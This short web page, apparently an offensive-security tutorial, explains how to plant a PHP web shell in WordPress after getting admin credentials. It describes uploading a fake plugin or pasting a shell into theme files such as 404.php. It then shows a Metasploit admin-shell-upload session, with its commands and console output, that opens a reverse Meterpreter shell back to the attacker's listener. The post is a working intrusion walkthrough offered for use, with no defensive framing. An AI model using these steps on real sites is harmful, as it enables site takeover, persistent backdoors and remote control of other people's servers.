How to upload a shell in WordPress

0

After getting WordPress admin credentials, you will need to upload a shell. You can do that by uploading a fake WordPress plugin containing the PHP shell. Or you can go to the Appearance menu and then went to the Editor. On the top of the list, you will find 404.php, you can copy the PHP shell and paste it inside 404.php.

Note: You can also edit other files such as header.php, footer.php ..etc.

404-php-shell

 

If you are lazy 🙂 you can use a Metasploit module called WordPress Admin Shell Upload.

msf exploit(wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(wp_admin_shell_upload) > set PASSWORD password123
PASSWORD => password123
msf exploit(wp_admin_shell_upload) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf exploit(wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Authenticating with WordPress using admin:password123...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/ByYCGRdIIA/oEodftPPNp.php...
[*] Sending stage (33721 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:39107)

 

Leave A Reply

Your email address will not be published.